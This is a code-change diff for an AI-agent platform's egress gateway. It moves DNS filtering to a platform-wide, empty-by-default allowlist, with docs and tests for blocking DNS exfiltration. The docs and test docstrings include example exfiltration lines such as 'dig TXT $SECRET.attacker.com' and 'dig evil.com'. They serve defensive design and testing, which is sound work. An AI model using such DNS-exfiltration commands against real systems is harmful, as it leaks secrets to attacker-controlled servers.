### PR TITLE
refactor(egress): platform-level DNS allowlist — decouple DNS plane from identity

### DIFF
--- a/README.md
+++ b/README.md
@@ -174,6 +174,8 @@ channel with its bot tokens.
 |------------------------------|--------------------------------------------------------------------------|
 | `ASSISTANT_NAME`             | Display name for your AI coworker.                                       |
 | `CONTAINER_NETWORK_NAME`     | EC-2 agent bridge (Internal=true) + egress gateway. Defaults to `rolemesh-agent-net` (EC **on**); set to `""` to roll back to the plain Docker bridge. |
+| `EGRESS_DNS_ALLOWLIST`       | Platform-wide DNS allowlist for the gateway resolver (comma-separated, `exact` or `*.suffix`). Default **empty** — proxied traffic never needs agent-side DNS, so the resolver is a tripwire; see docs/16. |
+| `EGRESS_DNS_MODE`            | `enforce` (default: non-matching names get NXDOMAIN) or `observe` (resolve everything, log would-be blocks; migration aid only). |
 | `ROLEMESH_ENV`               | `development` (default) or `production`. See note below.                 |
 | `ROLEMESH_SEED_ADMIN_EMAIL`  | If set, the WebUI seeds a `platform_admin` with this email at startup.   |
 | `WS_TICKET_SECRET`           | **Required.** Dedicated signing key for WebSocket handshake tickets.     |

--- a/docs/16-egress-control-architecture-cn.md
+++ b/docs/16-egress-control-architecture-cn.md
@@ -198,19 +198,49 @@ agent 发 https://github.com/...
   ↓ agent ↔ github.com 端到端 TLS (Gateway 不解密)
 ```
 
-**DNS 路径**：
+**DNS 路径**（平台级策略 — 见下文"DNS 面：平台级策略"）：
 ```
-agent: dig api.anthropic.com
+agent: dig metrics.corp.example      # 在 EGRESS_DNS_ALLOWLIST 中
   ↓ UDP 53 → Gateway 内 DNS resolver
-  ↓ Safety pipeline (EGRESS_REQUEST, host=api.anthropic.com, mode=dns)
+  ↓ 平台白名单命中（无身份判定，对所有租户一致）
   ↓ allow → 递归向上游查询 → 返回 A 记录
 
 agent: dig evil.com
   ↓ UDP 53 → Gateway 内 DNS resolver
-  ↓ Safety pipeline → block (域名不在白名单)
+  ↓ 平台白名单未命中 → block
   ↓ 返回 NXDOMAIN, 不向上游查询
   ↓ ★ 攻击者控制的 DNS 完全收不到任何信号
 ```
+
+### DNS 面：平台级策略（非按租户）
+
+DNS resolver 最初通过源 IP 身份映射复用按租户的 `egress.domain_rule`
+规则行。这层耦合已退役：DNS 决策现在来自一份平台级全局白名单
+（`EGRESS_DNS_ALLOWLIST`，默认**空表**），配合 `EGRESS_DNS_MODE`：
+`enforce`（默认）或 `observe`（全部放行、记录本应拦截的查询；仅作迁移
+观察用）。
+
+为什么平台级足够 — 以及为什么这份列表保持空：
+
+- 经代理的流量从不在 agent 容器内解析目标域名。设置了 `HTTP_PROXY`
+  后，SDK 把域名作为字符串交给 gateway（CONNECT 请求行 / 绝对形式
+  URL），由 **gateway** 在自己的出口侧解析链路上解析——本策略不约束
+  那条链路。按租户的访问控制在 CONNECT / reverse proxy 层，原样保留。
+- 容器名（`nats`、`egress-gateway`）由 Docker 内嵌 DNS（127.0.0.11）
+  本地应答；只有外部域名会被转发到 gateway resolver。
+- 因此到达本 resolver 的每个查询都来自绕开代理约定的代码——要么是
+  未配置代理的工具，要么是 DNS 渗出攻击。在这里放行任何域名都救不了
+  任何合法流程（网桥没有到解析结果的路由）；这个 resolver 是**绊网**
+  而不是服务。修复不认代理的工具，而不是放宽这份列表。
+- 租户自助配置绝不能触达这份列表：否则恶意租户把自己控制的域名加入
+  白名单，等于给**所有**租户的被攻陷 agent 开了一条 DNS 渗出通道。
+  列表由运维设置（env），将来若确需运行时编辑，升级路径是
+  `platform_safety_rules`。
+
+审计影响：DNS 决策记录为 gateway 结构化日志（qname 在注册域之外
+脱敏），不再写 `safety_decisions` 行——平台级决策不携带审计 fan-in
+做 coworker 复验所需的 per-agent 身份。HTTP 面保留完整的按租户审计
+归因；一次 DNS 渗出尝试几乎总是伴随一条可归因的 CONNECT 拦截记录。
 
 ---
 

--- a/docs/16-egress-control-architecture.md
+++ b/docs/16-egress-control-architecture.md
@@ -200,19 +200,58 @@ agent sends https://github.com/...
   ↓ agent ↔ github.com end-to-end TLS (Gateway does not decrypt)
 ```
 
-**DNS path**:
+**DNS path** (platform policy — see "DNS plane: platform-level policy" below):
 ```
-agent: dig api.anthropic.com
+agent: dig metrics.corp.example      # on EGRESS_DNS_ALLOWLIST
   ↓ UDP 53 → Gateway-internal DNS resolver
-  ↓ Safety pipeline (EGRESS_REQUEST, host=api.anthropic.com, mode=dns)
+  ↓ platform allowlist match (identity-free, identical for all tenants)
   ↓ allow → recursive query upstream → return A record
 
 agent: dig evil.com
   ↓ UDP 53 → Gateway-internal DNS resolver
-  ↓ Safety pipeline → block (domain not in allowlist)
+  ↓ platform allowlist miss → block
   ↓ Return NXDOMAIN, do not query upstream
   ↓ ★ Attacker-controlled DNS receives nothing
 ```
+
+### DNS plane: platform-level policy (not per-tenant)
+
+The DNS resolver originally re-used the per-tenant `egress.domain_rule`
+rows via the source-IP identity map. That coupling was retired: DNS
+decisions now come from a single platform-wide allowlist
+(`EGRESS_DNS_ALLOWLIST`, default **empty**), with an `EGRESS_DNS_MODE`
+of `enforce` (default) or `observe` (resolve everything, log would-be
+blocks; migration aid only).
+
+Why platform-level is sufficient — and why the list stays empty:
+
+- Proxied traffic never resolves its target inside the agent
+  container. With `HTTP_PROXY` set, the SDK hands the hostname to the
+  gateway as a string (CONNECT request line / absolute-form URL) and
+  the **gateway** resolves it on its own egress-side resolver path,
+  which this policy does not touch. Per-tenant access control happens
+  at the CONNECT / reverse-proxy layer, unchanged.
+- Container names (`nats`, `egress-gateway`) are answered locally by
+  Docker's embedded DNS (127.0.0.11); only external names are
+  forwarded to the gateway resolver.
+- Therefore every query that reaches this resolver comes from code
+  bypassing the proxy convention — a tool missing proxy config, or a
+  DNS-exfiltration attempt. Allowing a name here rescues no legitimate
+  flow (the bridge has no route to the resolved address); the resolver
+  is a **tripwire**, not a service. Fix proxy-unaware tools at the
+  tool, not by widening this list.
+- Tenant self-service must not reach this list: a malicious tenant
+  allowlisting an attacker-controlled apex would otherwise open a DNS
+  exfil channel usable by *every* tenant's compromised agents. The
+  list is operator-set (env), with `platform_safety_rules` as the
+  upgrade path if runtime editing is ever needed.
+
+Audit consequence: DNS decisions are recorded as structured gateway
+logs (qname redacted past the registered domain) rather than
+`safety_decisions` rows — platform-level decisions carry no per-agent
+identity for the audit fan-in's coworker re-validation. The
+HTTP planes retain full per-tenant audit attribution; a DNS-exfil
+attempt almost always pairs with an attributed CONNECT block.
 
 ---
 

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -54,6 +54,9 @@ dev = [
     "ruff>=0.8",
     "mypy>=1.13",
     "testcontainers[postgres]>=4.0",
+    # Gateway-runtime dep (see Dockerfile.egress-gateway); mirrored here
+    # so the dns_resolver unit tests can build/parse real DNS packets.
+    "dnslib>=0.9",
 ]
 # V2 Safety Framework: optional ML-backed checks. Install with
 # ``uv sync --extra safety-ml`` to enable presidio.pii,

--- a/src/rolemesh/egress/dns_policy.py
+++ b/src/rolemesh/egress/dns_policy.py
@@ -1,0 +1,123 @@
+"""Platform-wide DNS allowlist for the gateway's authoritative resolver.
+
+Replaces the per-tenant rule lookup the DNS plane used until this
+module: tenant ``egress.domain_rule`` rows keep governing the HTTP
+planes (forward CONNECT + reverse proxy), but DNS decisions are now a
+single platform-level policy, identical for every agent.
+
+Why platform-level is enough here
+---------------------------------
+
+Agents reach the outside world exclusively through the proxies, and a
+proxied request never resolves its target inside the agent container —
+the hostname travels to the gateway as a string and the gateway
+resolves it on its own egress-side resolver path, which this policy
+does not touch. The only queries that arrive at the gateway's
+``DnsServer`` therefore come from code that bypasses the proxy
+convention (raw ``getaddrinfo`` calls): either a tool missing proxy
+configuration, or a DNS-exfiltration attempt. Neither deserves a
+per-tenant answer, and serving one required the source-IP → identity
+machinery this refactor is retiring (see docs/16, "DNS plane").
+
+The expected steady-state allowlist is EMPTY. Resolution through this
+server is a tripwire, not a service: a legitimate flow that fails here
+should be fixed by making the tool honor ``HTTP_PROXY``, not by
+widening this list — even a successful resolution buys the caller
+nothing, because the agent bridge has no route to the resolved address.
+
+Modes
+-----
+
+``enforce`` (default)
+    Non-matching names get NXDOMAIN and the query never reaches the
+    upstream resolver. Fail-closed, matching the rest of the EC stack.
+
+``observe``
+    Every name resolves, but would-be blocks are logged at WARNING.
+    Migration aid: run a real workload against ``observe`` for a few
+    days and every log line is a tool that needs proxy configuration
+    (or an incident). Not a steady-state setting.
+
+Configuration is environment-only by design — the list is expected to
+stay empty and essentially never change, so a DB row plus gateway-side
+snapshot/invalidation plumbing would be cost without benefit. If a
+runtime-editable list is ever genuinely needed, the upgrade path is the
+``platform_safety_rules`` catalog; this module's ``decide()`` is the
+single seam where that lookup would slot in.
+"""
+
+from __future__ import annotations
+
+import os
+from dataclasses import dataclass
+from typing import Literal
+
+from rolemesh.core.logger import get_logger
+from rolemesh.safety.checks.egress_domain_rule import matches_domain
+
+logger = get_logger()
+
+
+# Env knobs, read by ``from_env`` at gateway boot (the gateway container
+# bind-mounts .env, so these are operator-settable without a rebuild).
+ALLOWLIST_ENV = "EGRESS_DNS_ALLOWLIST"
+MODE_ENV = "EGRESS_DNS_MODE"
+
+DnsMode = Literal["enforce", "observe"]
+
+_VALID_MODES: frozenset[str] = frozenset({"enforce", "observe"})
+
+
+@dataclass(frozen=True)
+class GlobalDnsPolicy:
+    """Immutable platform DNS policy: pattern list + enforcement mode.
+
+    Frozen for the same reason ``Identity`` was: the hot path shares one
+    instance across every in-flight query and must not be able to
+    mutate it. Pattern semantics are exactly ``egress.domain_rule``'s
+    (exact match or ``*.suffix``), via the shared ``matches_domain``.
+    """
+
+    patterns: tuple[str, ...] = ()
+    mode: DnsMode = "enforce"
+
+    def is_allowed(self, qname: str) -> bool:
+        """True when *qname* matches any allowlist pattern."""
+        return any(matches_domain(qname, p) for p in self.patterns)
+
+    @classmethod
+    def from_env(cls) -> GlobalDnsPolicy:
+        """Build the policy from EGRESS_DNS_ALLOWLIST / EGRESS_DNS_MODE.
+
+        Raises ``ValueError`` on an unknown mode so a typo like
+        ``EGRESS_DNS_MODE=observ`` kills the gateway at boot instead of
+        silently running in whichever mode the typo happens not to be.
+        Empty / whitespace allowlist entries are dropped rather than
+        rejected — trailing commas are a fact of .env editing.
+        """
+        raw_list = os.environ.get(ALLOWLIST_ENV, "")
+        patterns = tuple(p.strip() for p in raw_list.split(",") if p.strip())
+
+        raw_mode = os.environ.get(MODE_ENV, "enforce").strip().lower()
+        if raw_mode not in _VALID_MODES:
+            raise ValueError(
+                f"{MODE_ENV} must be one of {sorted(_VALID_MODES)}, "
+                f"got {raw_mode!r}"
+            )
+
+        policy = cls(patterns=patterns, mode=raw_mode)  # type: ignore[arg-type]
+        logger.info(
+            "dns policy loaded",
+            mode=policy.mode,
+            pattern_count=len(policy.patterns),
+            patterns=list(policy.patterns),
+        )
+        return policy
+
+
+__all__ = [
+    "ALLOWLIST_ENV",
+    "MODE_ENV",
+    "DnsMode",
+    "GlobalDnsPolicy",
+]

--- a/src/rolemesh/egress/dns_resolver.py
+++ b/src/rolemesh/egress/dns_resolver.py
@@ -12,12 +12,21 @@ query from the agent arrives here. The gateway then:
 
   1. Accepts only A / AAAA / CNAME queries (blocks TXT / ANY / SRV /
      NULL / WKS which are the usual tunneling carriers).
-  2. Resolves the source IP to an Identity; unknown source → REFUSED.
-  3. Runs the same Safety pipeline as forward_proxy, with mode='dns'.
-  4. On allow, recurses to the upstream resolver list.
-  5. On block, responds NXDOMAIN — the attacker's DNS server gets
+  2. Evaluates the qname against the platform-wide
+     :class:`rolemesh.egress.dns_policy.GlobalDnsPolicy` — the same
+     answer for every tenant; see that module for why DNS does not
+     need per-tenant identity (proxied traffic never resolves its
+     target in the agent container).
+  3. On allow, recurses to the upstream resolver list.
+  4. On block, responds NXDOMAIN — the attacker's DNS server gets
      nothing, not even a resolve-failure signal, because we never
      emit the query upstream.
+
+Decisions are recorded as structured gateway logs (qname redacted past
+the registered domain, mirroring safety_call's audit redaction) rather
+than ``safety_decisions`` rows: the audit fan-in requires an
+authenticated per-agent identity, which platform-level DNS decisions
+deliberately no longer carry.
 """
 
 from __future__ import annotations
@@ -29,11 +38,10 @@ from typing import TYPE_CHECKING
 
 from rolemesh.core.logger import get_logger
 
-from .safety_call import EgressRequest
+from .safety_call import redact_dns_qname
 
 if TYPE_CHECKING:
-    from .identity import IdentityResolver
-    from .safety_call import EgressSafetyCaller
+    from .dns_policy import GlobalDnsPolicy
 
 logger = get_logger()
 
@@ -66,7 +74,7 @@ class UpstreamResolver:
 
 
 class DnsServer:
-    """Asyncio UDP server that evaluates each query through the Safety pipeline.
+    """Asyncio UDP server that evaluates each query against the platform policy.
 
     State is captured in the constructor so the datagram handler is a
     pure function of the packet + the resolver closure — makes testing
@@ -76,14 +84,12 @@ class DnsServer:
     def __init__(
         self,
         *,
-        identity_resolver: IdentityResolver,
-        safety_caller: EgressSafetyCaller,
+        policy: GlobalDnsPolicy,
         upstreams: list[UpstreamResolver],
     ) -> None:
         if not upstreams:
             raise ValueError("DnsServer requires at least one upstream resolver")
-        self._identity = identity_resolver
-        self._safety = safety_caller
+        self._policy = policy
         self._upstreams = list(upstreams)
         self._transport: asyncio.DatagramTransport | None = None
 
@@ -149,26 +155,35 @@ class DnsServer:
             respond(_build_error(query, _RCODE_REFUSED))
             return
 
-        identity = self._identity.resolve(source_addr[0])
-        decision = await self._safety.decide(
-            identity=identity,
-            request=EgressRequest(
-                host=qname,
-                port=0,  # DNS is port-less
-                mode="dns",
-                qtype=qtype,
-            ),
-        )
-        if decision.action == "block":
+        # Platform-wide policy: same answer for every source. The qname
+        # is redacted in logs past the registered domain — exfil
+        # attempts put the payload in the leftmost labels, and this
+        # tripwire's own log must not become the place it lands.
+        if not self._policy.is_allowed(qname):
+            display = redact_dns_qname(qname)
+            if self._policy.mode == "observe":
+                logger.warning(
+                    "dns: would block (observe mode)",
+                    source=source_addr[0],
+                    qname=display,
+                    qtype=qtype,
+                )
+            else:
+                logger.warning(
+                    "dns: blocked",
+                    source=source_addr[0],
+                    qname=display,
+                    qtype=qtype,
+                )
+                respond(_build_error(query, _RCODE_NXDOMAIN))
+                return
+        else:
             logger.info(
-                "dns: blocked",
+                "dns: allowed",
                 source=source_addr[0],
                 qname=qname,
                 qtype=qtype,
-                reason=decision.reason,
             )
-            respond(_build_error(query, _RCODE_NXDOMAIN))
-            return
 
         # Recurse upstream. The first upstream to respond within budget
         # wins; the rest are cancelled. Falling all the way through

--- a/src/rolemesh/egress/gateway.py
+++ b/src/rolemesh/egress/gateway.py
@@ -52,6 +52,7 @@ from rolemesh.core.config import (
 )
 from rolemesh.core.logger import get_logger
 
+from .dns_policy import GlobalDnsPolicy
 from .dns_resolver import DnsServer, UpstreamResolver
 from .forward_proxy import ForwardProxy
 from .identity import (
@@ -86,6 +87,8 @@ logger = get_logger()
 #   workloads.
 # EGRESS_SNAPSHOT_TIMEOUT: how long the gateway waits for the initial
 #   rule snapshot before giving up and failing start.
+# EGRESS_DNS_ALLOWLIST / EGRESS_DNS_MODE: platform DNS policy — see
+#   dns_policy.py for semantics and the empty-by-default rationale.
 _UPSTREAM_DNS_DEFAULT = "8.8.8.8,1.1.1.1"
 _SNAPSHOT_TIMEOUT_S = 5.0
 
@@ -118,6 +121,11 @@ async def main() -> None:
     upstream_dns = _parse_upstream_dns(
         os.environ.get("EGRESS_UPSTREAM_DNS", _UPSTREAM_DNS_DEFAULT)
     )
+
+    # Platform DNS policy. Loaded before any network setup so a config
+    # typo (bad EGRESS_DNS_MODE) kills the boot immediately — same
+    # fail-closed posture as the rule-snapshot fetch below.
+    dns_policy = GlobalDnsPolicy.from_env()
 
     # Import nats-py lazily so unit tests importing this module don't
     # require the dependency. The gateway Dockerfile pins it, so
@@ -265,9 +273,10 @@ async def main() -> None:
         stack.push_async_callback(_close_forward)
 
         # --- DNS resolver (port 53) ----------------------------------
+        # Platform-wide policy, no identity: see dns_policy.py for why
+        # the DNS plane is the one place per-tenant scoping buys nothing.
         dns = DnsServer(
-            identity_resolver=identity,
-            safety_caller=safety,
+            policy=dns_policy,
             upstreams=upstream_dns,
         )
         await dns.serve("0.0.0.0", EGRESS_GATEWAY_DNS_PORT)
@@ -282,6 +291,7 @@ async def main() -> None:
             reverse_port=CREDENTIAL_PROXY_PORT,
             forward_port=EGRESS_GATEWAY_FORWARD_PORT,
             dns_port=EGRESS_GATEWAY_DNS_PORT,
+            dns_mode=dns_policy.mode,
             upstreams=[f"{u.host}:{u.port}" for u in upstream_dns],
             stage="EC-2",
         )

--- a/src/rolemesh/egress/safety_call.py
+++ b/src/rolemesh/egress/safety_call.py
@@ -234,7 +234,7 @@ class AuditPublisher:
         # ``context_digest`` above keeps the SHA-256 so dedup of
         # repeated queries still works.
         display_host = (
-            _redact_dns_qname(request.host)
+            redact_dns_qname(request.host)
             if request.mode == "dns"
             else request.host
         )
@@ -269,12 +269,13 @@ class AuditPublisher:
             )
 
 
-def _redact_dns_qname(qname: str) -> str:
+def redact_dns_qname(qname: str) -> str:
     """Keep the last two labels, redact everything to their left.
 
     Egress-design threat: an agent sends a DNS query whose leftmost
     labels are the thing the attacker wants to exfiltrate. Dropping
     everything past the public-suffix heuristic keeps the audit row
+    (and dns_resolver's decision logs, which share this helper)
     useful ("some query under attacker.com") without recording the
     secret. The two-label heuristic is a deliberate simplification —
     proper Public Suffix List handling lives in V2's secret scanner

--- a/src/rolemesh/safety/checks/egress_domain_rule.py
+++ b/src/rolemesh/safety/checks/egress_domain_rule.py
@@ -91,12 +91,17 @@ class EgressDomainRuleConfig(BaseModel):
         return clean
 
 
-def _matches(host: str, pattern: str) -> bool:
+def matches_domain(host: str, pattern: str) -> bool:
     """Domain-aware match used by the gateway and the admin-side check.
 
     Both sides strip trailing dots + lowercase; keeps
     "Api.Anthropic.com." identical to "api.anthropic.com" regardless of
     which side of the wire the label came from.
+
+    Public because ``rolemesh.egress.dns_policy`` shares it — the
+    platform DNS allowlist and the tenant ``egress.domain_rule`` rules
+    must agree on what ``*.example.com`` means, and one function is the
+    only way to keep them from drifting.
     """
     pattern = pattern.lower().rstrip(".")
     host = host.lower().rstrip(".")
@@ -162,7 +167,7 @@ class EgressDomainRuleCheck:
         if cfg.ports is not None and port not in cfg.ports:
             return Verdict(action="allow")
         matched = next(
-            (p for p in cfg.domain_patterns if _matches(host, p)), None
+            (p for p in cfg.domain_patterns if matches_domain(host, p)), None
         )
         if matched is None:
             return Verdict(action="allow")
@@ -186,7 +191,7 @@ def make_egress_domain_check() -> Any:
             -> tuple[bool, list[dict]]
     — a flat shape that doesn't require importing the full
     ``SafetyContext`` type into the gateway image. This factory
-    returns exactly that callable, sharing the ``_matches`` helper
+    returns exactly that callable, sharing the ``matches_domain`` helper
     with the Protocol-compliant class above.
     """
     async def _check(
@@ -203,7 +208,7 @@ def make_egress_domain_check() -> Any:
         if cfg.ports is not None and port not in cfg.ports:
             return False, []
         matched = next(
-            (p for p in cfg.domain_patterns if _matches(host, p)), None
+            (p for p in cfg.domain_patterns if matches_domain(host, p)), None
         )
         if matched is None:
             return False, []
@@ -224,4 +229,5 @@ __all__ = [
     "EgressDomainRuleCheck",
     "EgressDomainRuleConfig",
     "make_egress_domain_check",
+    "matches_domain",
 ]

--- a/tests/egress/integration/conftest.py
+++ b/tests/egress/integration/conftest.py
@@ -217,6 +217,11 @@ async def topology(docker_client: aiodocker.Docker) -> AsyncIterator[Topology]:
                 # smoke test. Block-path tests never reach upstream so
                 # this isn't load-bearing for those.
                 "EGRESS_UPSTREAM_DNS=8.8.8.8,1.1.1.1",
+                # Platform DNS allowlist (session-wide; the gateway is
+                # session-scoped). dns.google backs the allow-path smoke
+                # test in test_p0_dns — it needs a name that really
+                # resolves on the public upstreams above.
+                "EGRESS_DNS_ALLOWLIST=dns.google",
             ],
             "HostConfig": {
                 "NetworkMode": agent_network,

--- a/tests/egress/integration/test_p0_dns.py
+++ b/tests/egress/integration/test_p0_dns.py
@@ -1,15 +1,20 @@
 """P0#3 — DNS exfil channel closed (§6.3 of the EC design).
 
-Three invariants under test:
+Four invariants under test against the PLATFORM DNS policy (the DNS
+plane no longer consults tenant rules or source identity — see
+``rolemesh.egress.dns_policy``):
 
   1. Any qtype outside {A, AAAA, CNAME} returns REFUSED — the
      classic DNS exfil payload ``dig TXT $SECRET.attacker.com`` gets
-     nothing.
-  2. An A query for a domain NOT in the allowlist returns NXDOMAIN AND
-     never reaches the upstream resolver (no signal to the attacker's
-     authoritative DNS).
-  3. An A query for an allowlisted domain resolves to a real address
-     via upstream recursion (i.e. the allow path still works).
+     nothing, even for an allowlisted apex.
+  2. An A query for a domain NOT in EGRESS_DNS_ALLOWLIST returns
+     NXDOMAIN AND never reaches the upstream resolver (no signal to
+     the attacker's authoritative DNS).
+  3. The answer is identical for an UNREGISTERED probe — no lifecycle
+     event, no identity. Platform policy means the resolver needs no
+     idea who is asking, and fail-closed needs no registration.
+  4. An A query for an allowlisted domain (``dns.google``, set in
+     conftest's gateway Env) recurses upstream and resolves NOERROR.
 
 Because the probe container doesn't have ``dig`` preinstalled, we
 construct minimal DNS query packets with pure Python stdlib and parse
@@ -32,24 +37,8 @@ pytestmark = [
 ]
 
 
-TENANT_ID = "tenant-a"
-COWORKER_ID = "coworker-x"
-
-
-async def _seed_allowlist(topology: Topology, allow_host: str) -> None:
-    rule = {
-        "id": "rule-p0-3",
-        "rule_id": "rule-p0-3",
-        "tenant_id": TENANT_ID,
-        "coworker_id": None,
-        "stage": "egress_request",
-        "check_id": "egress.domain_rule",
-        "config": {"domain_patterns": [allow_host]},
-        "priority": 100,
-        "enabled": True,
-    }
-    await topology.seed_rules_responder([rule])
-    await topology.publish_rule_changed("created", rule)
+# Must match conftest's EGRESS_DNS_ALLOWLIST entry on the gateway Env.
+ALLOWLISTED_NAME = "dns.google"
 
 
 def _dns_probe_script(qname: str, qtype: str, gateway_ip: str) -> str:
@@ -99,22 +88,10 @@ async def test_txt_query_refused(
     """TXT qtype MUST return REFUSED even for names inside the
     allowlist — otherwise an attacker with a whitelisted apex can
     still exfiltrate data via TXT records."""
-    await _seed_allowlist(topology, topology.fake_upstream_name)
-
     probe = await topology.spawn_probe()
-    await topology.publish_lifecycle_started(
-        probe,
-        identity={
-            "tenant_id": TENANT_ID,
-            "coworker_id": COWORKER_ID,
-            "user_id": "u",
-            "conversation_id": "c",
-            "job_id": "job-p0-3-txt",
-        },
-    )
 
     rc, out = await probe.exec_sh(
-        f"python3 - <<'PY'\n{_dns_probe_script(topology.fake_upstream_name, 'TXT', topology.gateway_ip_on_agent_net)}\nPY"
+        f"python3 - <<'PY'\n{_dns_probe_script(ALLOWLISTED_NAME, 'TXT', topology.gateway_ip_on_agent_net)}\nPY"
     )
     assert rc == 0, out
     assert "RESULT=REFUSED" in out, out
@@ -125,19 +102,7 @@ async def test_any_query_refused(
 ) -> None:
     """ANY is the other classic exfil multiplexer — separate test so
     the failure mode is attributed correctly."""
-    await _seed_allowlist(topology, topology.fake_upstream_name)
-
     probe = await topology.spawn_probe()
-    await topology.publish_lifecycle_started(
-        probe,
-        identity={
-            "tenant_id": TENANT_ID,
-            "coworker_id": COWORKER_ID,
-            "user_id": "u",
-            "conversation_id": "c",
-            "job_id": "job-p0-3-any",
-        },
-    )
 
     rc, out = await probe.exec_sh(
         f"python3 - <<'PY'\n{_dns_probe_script('example.com', 'ANY', topology.gateway_ip_on_agent_net)}\nPY"
@@ -151,23 +116,30 @@ async def test_a_query_blocked_domain_is_nxdomain(
 ) -> None:
     """A query for a non-allowlisted name gets NXDOMAIN — and crucially
     the upstream resolver never sees the query, so the attacker's
-    authoritative DNS records no hit."""
-    await _seed_allowlist(topology, topology.fake_upstream_name)
+    authoritative DNS records no hit.
 
+    Deliberately NO lifecycle event for this probe: the platform
+    policy must answer identically for an agent the gateway has never
+    heard of (fail-closed without registration)."""
     probe = await topology.spawn_probe()
-    await topology.publish_lifecycle_started(
-        probe,
-        identity={
-            "tenant_id": TENANT_ID,
-            "coworker_id": COWORKER_ID,
-            "user_id": "u",
-            "conversation_id": "c",
-            "job_id": "job-p0-3-block",
-        },
-    )
 
     rc, out = await probe.exec_sh(
         f"python3 - <<'PY'\n{_dns_probe_script('evil-unknown-host-p0-3.test', 'A', topology.gateway_ip_on_agent_net)}\nPY"
     )
     assert rc == 0, out
     assert "RESULT=NXDOMAIN" in out, out
+
+
+async def test_a_query_allowlisted_domain_resolves(
+    topology: Topology, per_test_cleanup: None
+) -> None:
+    """Allow path: a name on the platform allowlist recurses to the
+    real upstream resolvers and comes back NOERROR. Needs outbound
+    internet from the Docker host (same requirement as image pulls)."""
+    probe = await topology.spawn_probe()
+
+    rc, out = await probe.exec_sh(
+        f"python3 - <<'PY'\n{_dns_probe_script(ALLOWLISTED_NAME, 'A', topology.gateway_ip_on_agent_net)}\nPY"
+    )
+    assert rc == 0, out
+    assert "RESULT=NOERROR" in out, out

--- a/tests/egress/test_dns_policy.py
+++ b/tests/egress/test_dns_policy.py
@@ -1,0 +1,57 @@
+"""Tests for the platform DNS policy (env parsing + match semantics).
+
+The matching function itself (``matches_domain``) belongs to
+``egress_domain_rule`` and is covered there; these tests pin the
+policy-level contract: env round-trip, default fail-closed mode, and
+the loud failure on a mode typo.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from rolemesh.egress.dns_policy import (
+    ALLOWLIST_ENV,
+    MODE_ENV,
+    GlobalDnsPolicy,
+)
+
+
+def test_default_policy_is_enforce_and_empty() -> None:
+    policy = GlobalDnsPolicy()
+    assert policy.mode == "enforce"
+    assert policy.patterns == ()
+    assert not policy.is_allowed("example.com")
+
+
+def test_exact_and_wildcard_patterns() -> None:
+    policy = GlobalDnsPolicy(patterns=("api.example.com", "*.github.com"))
+    assert policy.is_allowed("api.example.com")
+    assert policy.is_allowed("API.Example.COM.")  # case + trailing dot
+    assert policy.is_allowed("raw.github.com")
+    assert not policy.is_allowed("github.com.evil.com")
+    assert not policy.is_allowed("example.com")
+
+
+def test_from_env_defaults(monkeypatch: pytest.MonkeyPatch) -> None:
+    monkeypatch.delenv(ALLOWLIST_ENV, raising=False)
+    monkeypatch.delenv(MODE_ENV, raising=False)
+    policy = GlobalDnsPolicy.from_env()
+    assert policy.mode == "enforce"
+    assert policy.patterns == ()
+
+
+def test_from_env_parses_list_and_mode(monkeypatch: pytest.MonkeyPatch) -> None:
+    # Trailing comma + stray whitespace are .env-editing facts of life.
+    monkeypatch.setenv(ALLOWLIST_ENV, " metrics.corp , *.example.com ,")
+    monkeypatch.setenv(MODE_ENV, "Observe")
+    policy = GlobalDnsPolicy.from_env()
+    assert policy.patterns == ("metrics.corp", "*.example.com")
+    assert policy.mode == "observe"
+
+
+def test_from_env_rejects_bad_mode(monkeypatch: pytest.MonkeyPatch) -> None:
+    """A typo'd mode must kill the gateway boot, not silently pick one."""
+    monkeypatch.setenv(MODE_ENV, "audit")
+    with pytest.raises(ValueError, match="EGRESS_DNS_MODE"):
+        GlobalDnsPolicy.from_env()

--- a/tests/egress/test_dns_resolver.py
+++ b/tests/egress/test_dns_resolver.py
@@ -1,0 +1,113 @@
+"""Unit tests for DnsServer's packet handler against the platform policy.
+
+These drive ``_handle_packet`` directly with real dnslib-built packets
+(dnslib is mirrored into the dev extra for exactly this) and stub the
+upstream recursion, so the full qtype-gate → policy → respond pipeline
+runs without sockets.
+
+Invariants pinned:
+
+  * qtype outside {A, AAAA, CNAME} → REFUSED, upstream never contacted
+    — even for an allowlisted name (exfil via TXT under a whitelisted
+    apex must stay closed).
+  * enforce + non-allowlisted name → NXDOMAIN, upstream never contacted
+    (the attacker's authoritative NS records no hit).
+  * enforce + allowlisted name → upstream response forwarded verbatim.
+  * observe + non-allowlisted name → resolves (logged, not blocked).
+  * upstream outage on an allowed query → SERVFAIL, not NXDOMAIN.
+"""
+
+from __future__ import annotations
+
+import dnslib
+import pytest
+
+from rolemesh.egress.dns_policy import GlobalDnsPolicy
+from rolemesh.egress.dns_resolver import DnsServer, UpstreamResolver
+
+pytestmark = pytest.mark.asyncio
+
+
+_SOURCE = ("172.30.0.9", 53535)
+
+
+def _query(qname: str, qtype: str) -> bytes:
+    return dnslib.DNSRecord.question(qname, qtype).pack()
+
+
+def _rcode(packet: bytes) -> str:
+    parsed = dnslib.DNSRecord.parse(packet)
+    return dnslib.RCODE.get(parsed.header.rcode)
+
+
+class _Harness:
+    """DnsServer with the upstream leg replaced by a canned answer."""
+
+    def __init__(self, policy: GlobalDnsPolicy, *, upstream_answers: bool = True) -> None:
+        self.server = DnsServer(
+            policy=policy,
+            upstreams=[UpstreamResolver(host="192.0.2.1")],  # TEST-NET, never dialed
+        )
+        self.upstream_calls: list[bytes] = []
+        self.responses: list[bytes] = []
+
+        async def _fake_upstream(data: bytes) -> bytes | None:
+            self.upstream_calls.append(data)
+            if not upstream_answers:
+                return None
+            reply = dnslib.DNSRecord.parse(data).reply()
+            reply.add_answer(
+                *dnslib.RR.fromZone("resolved.test. 60 A 198.51.100.7")
+            )
+            return reply.pack()
+
+        self.server._resolve_upstream = _fake_upstream  # type: ignore[method-assign]
+
+    async def ask(self, qname: str, qtype: str) -> None:
+        await self.server._handle_packet(
+            _query(qname, qtype), _SOURCE, self.responses.append
+        )
+
+
+async def test_txt_refused_even_for_allowlisted_name() -> None:
+    h = _Harness(GlobalDnsPolicy(patterns=("allowed.test",)))
+    await h.ask("allowed.test", "TXT")
+    assert [_rcode(r) for r in h.responses] == ["REFUSED"]
+    assert h.upstream_calls == []
+
+
+async def test_enforce_blocks_non_allowlisted_with_nxdomain() -> None:
+    h = _Harness(GlobalDnsPolicy())
+    await h.ask("secret-payload.evil.test", "A")
